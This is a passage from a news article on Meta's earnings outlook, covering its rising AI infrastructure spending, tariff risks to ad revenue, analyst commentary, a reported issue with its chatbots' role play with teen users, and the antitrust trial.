over the past few quarters. However, it is unclear if it will be enough to quell investor concerns. Analysts were disappointed by the first quarter revenue outlook Zuckerberg shared at the end of 2024. The company has also updated its outlook on spending for the next year with plans to spend anywhere from $64-72bn in capital expenditures including the cost of building out AI infrastructure. That is up from $65bn the company originally said it was expecting to spend in 2025. Total costs and expenditures for the first quarter were already at $24.76bn, a 9% increase compared to the year prior. Uncertainty over Donald Trump’s sweeping tariffs may yet roil ad markets, clouding the company’s financial outlook for near future quarters.
EMarketer
senior analyst Minda Smiley said the company’s “optimistic Q2 guidance signals that the company isn’t expecting any major dips in ad revenue” as a result of the tariffs. But that they don’t expect Meta will be spared from the downturn in the long term.
“On the one hand, the company stands to gain from economic instability. Advertisers will allocate more ad dollars to proven, sophisticated networks like Facebook and Instagram – all while pulling back spend on smaller social platforms – while they navigate uncertainty,” Smiley said. “On the other hand, a small but significant portion of Meta’s revenue comes from Chinese retailers like Temu and Shein advertising to US shoppers. That spend is starting to dry up as a result of trade and tariff change.”
Meta’s spending also continues to “weigh heavily on investors”, according to analyst Debra Aho Williamson, the founder and chief analyst of Sonata Insights. “But Meta will resist directly monetizing AI this year, focusing instead on building AI usage among its app users, advertisers and developers using Llama,” said Williamson.
In the weeks leading up to the earnings report, Meta has had a mix of AI-related news including the launch of a standalone AI app that would serve as its ChatGPT competitor. But a
WSJ report
exposed the existing chatbots integrated into the company’s various products, including Facebook and Instagram, were given the ability to perform “romantic role play” even with the platforms’ teen users. Executives at the company, which repeatedly has touted its nearly 1 billion users of its AI chatbots, also
admit
that many of those users access the chatbot through its hard-to-avoid takeover of the search bars of WhatsApp, Instagram and Facebook. The company has not detailed how many interactions with the chatbot or how deep those interactions need to be to consider a person a user of the AI chatbot.
Paired with Meta’s
ongoing antitrust trial
– where the company faces claims that it built an illegal social media monopoly with its acquisition of Instagram and WhatsApp – the uncertain AI future adds to the concerns some analysts may have around Meta’s financials despite what it may look like on paper.
“Meta’s earnings call comes at a precarious time where the company’s future is literally being
debated in court
– the results of which could fundamentally alter the social media landscape,” said Forrester VP’s research director,
Mike Proulx
. “Meta is smart to direct more resources into improving Threads and Facebook since those could be the only two apps the company is left with. It’s also notable that Meta just laid off a number of employees in its Reality Labs division, which has been a continued and growing leaky bucket for Meta.”